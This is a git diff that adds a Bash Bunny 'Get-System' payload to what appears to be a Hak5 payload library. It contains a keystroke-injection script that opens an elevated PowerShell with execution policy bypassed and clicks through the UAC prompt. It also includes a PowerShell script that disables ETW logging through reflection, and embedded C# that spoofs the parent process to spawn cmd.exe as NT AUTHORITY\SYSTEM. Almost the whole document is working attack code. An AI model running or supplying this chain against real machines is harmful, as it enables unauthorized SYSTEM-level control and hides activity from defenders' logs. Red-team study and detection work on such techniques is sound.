diff --git a/payloads/library/execution/Get-System/payload.ps1 b/payloads/library/execution/Get-System/payload.ps1 new file mode 100644 index 00000000..499ab780 --- /dev/null +++ b/payloads/library/execution/Get-System/payload.ps1 @@ -0,0 +1,36 @@ +# +# Author: TW-D +# Version: 1.0 +# + +# Disable "PowerShell" logging +$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static") +$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid()) +$etw_provider.SetValue($null, $event_provider) + +# Check if current process have "Administrator" privilege +If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) { + + # Check "SeDebugPrivilege" policy + $whoami_output = WHOAMI /PRIV | Select-String -Pattern "SeDebugPrivilege" + If ( ($whoami_output -clike "*Activ*") -Or ($whoami_output -clike "*Enabled*") ) { # For French/English OS + + # Retrieves the processes belonging to the "SYSTEM" account + $system_processes = (Get-Process -IncludeUserName | ? {$_.UserName -like "*SYST*"}).Id # For English/French OS + + # For each system PID, test to obtain the "SYSTEM" account via the parent process + Import-Module -Name ".\psgetsys.ps1" + $system_processes | ForEach-Object { + [MyProcess]::CreateProcessFromParent($_, "C:\WINDOWS\system32\cmd.exe", "/K ECHO Success > .\hak5_execution.txt") + Start-Sleep -Seconds 5 + $success = Test-Path -Path "C:\WINDOWS\system32\hak5_execution.txt" + If ($success) { + # Cleanup + Remove-Item -Path "C:\WINDOWS\system32\hak5_execution.txt" -Force + Exit + } + } + + } + +} \ No newline at end of file diff --git a/payloads/library/execution/Get-System/payload.txt b/payloads/library/execution/Get-System/payload.txt new file mode 100644 index 00000000..5906d4f0 --- /dev/null +++ b/payloads/library/execution/Get-System/payload.txt @@ -0,0 +1,78 @@ +#!/bin/bash +# +# Title: Get System Account +# +# Description: Spoofing "NT AUTHORITY\SYSTEM" via parent process using PowerShell and embedded C Sharp +# +# Author: TW-D +# Version: 1.0 +# Category: Execution +# Target: Microsoft Windows 10 +# Attackmodes: HID and STORAGE +# +# TESTED ON +# =============== +# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1) +# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1) +# +# REQUIREMENTS +# =============== +# The target user must belong to the 'Administrator' group. +# The target user have 'SeDebugPrivilege' token in 'Administrator' mode (by default). +# +# TOOLS +# =============== +# https://github.com/decoder-it/psgetsystem +# +# STATUS +# =============== +# Magenta solid ................................... SETUP +# Yellow single blink ............................. ATTACK +# Yellow double blink ............................. STAGE2 +# Yellow triple blink ............................. STAGE3 +# Green 1000ms VERYFAST blink followed by SOLID ... FINISH +# + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" + +######## SETUP ######## + +LED SETUP + +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +######## ATTACK ######## + +LED ATTACK + +Q GUI r +Q DELAY 5000 +Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass" +Q DELAY 1500 +Q CTRL-SHIFT ENTER +Q DELAY 5000 +Q LEFTARROW +Q DELAY 3000 +Q ENTER +Q DELAY 7000 + +LED STAGE2 + +Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\"" +Q ENTER +Q DELAY 2000 +Q STRING "CD \"\${BB_VOLUME}\"" +Q ENTER +Q DELAY 1500 + +LED STAGE3 + +Q STRING ".\payload.ps1" +Q ENTER + +######## FINISH ######## + +LED FINISH \ No newline at end of file diff --git a/payloads/library/execution/Get-System/psgetsys.ps1 b/payloads/library/execution/Get-System/psgetsys.ps1 new file mode 100644 index 00000000..11e3be49 --- /dev/null +++ b/payloads/library/execution/Get-System/psgetsys.ps1 @@ -0,0 +1,162 @@ +#Simple powershell/C# to spawn a process under a different parent process +#usage: import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(,) +$mycode = @" +using System; +using System.Diagnostics; +using System.IO; +using System.Runtime.InteropServices; + +public class MyProcess +{ + [DllImport("kernel32.dll")] + static extern uint GetLastError(); + + [DllImport("kernel32.dll")] + [return: MarshalAs(UnmanagedType.Bool)] + static extern bool CreateProcess( + string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, + ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, + IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, + out PROCESS_INFORMATION lpProcessInformation); + + [DllImport("kernel32.dll", SetLastError = true)] + [return: MarshalAs(UnmanagedType.Bool)] + private static extern bool UpdateProcThreadAttribute( + IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, + IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); + + [DllImport("kernel32.dll", SetLastError = true)] + [return: MarshalAs(UnmanagedType.Bool)] + private static extern bool InitializeProcThreadAttributeList( + IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); + + [DllImport("kernel32.dll", SetLastError = true)] + [return: MarshalAs(UnmanagedType.Bool)] + private static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList); + + [DllImport("kernel32.dll", SetLastError = true)] + static extern bool CloseHandle(IntPtr hObject); + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + struct STARTUPINFOEX + { + public STARTUPINFO StartupInfo; + public IntPtr lpAttributeList; + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + struct STARTUPINFO + { + public Int32 cb; + public string lpReserved; + public string lpDesktop; + public string lpTitle; + public Int32 dwX; + public Int32 dwY; + public Int32 dwXSize; + public Int32 dwYSize; + public Int32 dwXCountChars; + public Int32 dwYCountChars; + public Int32 dwFillAttribute; + public Int32 dwFlags; + public Int16 wShowWindow; + public Int16 cbReserved2; + public IntPtr lpReserved2; + public IntPtr hStdInput; + public IntPtr hStdOutput; + public IntPtr hStdError; + } + + [StructLayout(LayoutKind.Sequential)] + internal struct PROCESS_INFORMATION + { + public IntPtr hProcess; + public IntPtr hThread; + public int dwProcessId; + public int dwThreadId; + } + + [StructLayout(LayoutKind.Sequential)] + public struct SECURITY_ATTRIBUTES + { + public int nLength; + public IntPtr lpSecurityDescriptor; + public int bInheritHandle; + } + + public static void CreateProcessFromParent(int ppid, string command, string cmdargs) + { + const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000; + const uint CREATE_NEW_CONSOLE = 0x00000010; + const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000; + + + var pi = new PROCESS_INFORMATION(); + var si = new STARTUPINFOEX(); + si.StartupInfo.cb = Marshal.SizeOf(si); + IntPtr lpValue = IntPtr.Zero; + Process.EnterDebugMode(); + try + { + + var lpSize = IntPtr.Zero; + InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); + si.lpAttributeList = Marshal.AllocHGlobal(lpSize); + InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, ref lpSize); + var phandle = Process.GetProcessById(ppid).Handle; + Console.WriteLine("[+] Got Handle for ppid: {0}", ppid); + lpValue = Marshal.AllocHGlobal(IntPtr.Size); + Marshal.WriteIntPtr(lpValue, phandle); + + UpdateProcThreadAttribute( + si.lpAttributeList, + 0, + (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, + lpValue, + (IntPtr)IntPtr.Size, + IntPtr.Zero, + IntPtr.Zero); + + Console.WriteLine("[+] Updated proc attribute list"); + var pattr = new SECURITY_ATTRIBUTES(); + var tattr = new SECURITY_ATTRIBUTES(); + pattr.nLength = Marshal.SizeOf(pattr); + tattr.nLength = Marshal.SizeOf(tattr); + Console.Write("[+] Starting " + command + "..."); + var b= CreateProcess(command, cmdargs, ref pattr, ref tattr, false,EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref si, out pi); + Console.WriteLine(b+ " - pid: " + pi.dwProcessId+ " - Last error: " +GetLastError() ); + + } + finally + { + + if (si.lpAttributeList != IntPtr.Zero) + { + DeleteProcThreadAttributeList(si.lpAttributeList); + Marshal.FreeHGlobal(si.lpAttributeList); + } + Marshal.FreeHGlobal(lpValue); + + if (pi.hProcess != IntPtr.Zero) + { + CloseHandle(pi.hProcess); + } + if (pi.hThread != IntPtr.Zero) + { + CloseHandle(pi.hThread); + } + } + } + +} +"@ + Add-Type -TypeDefinition $mycode + +#Autoinvoke? + $cmdargs="" +if($args.Length -eq 3) +{ + $cmdargs= $args[1] + " " + $args[2] +} + +#[MyProcess]::CreateProcessFromParent($args[0],$args[1],$cmdargs)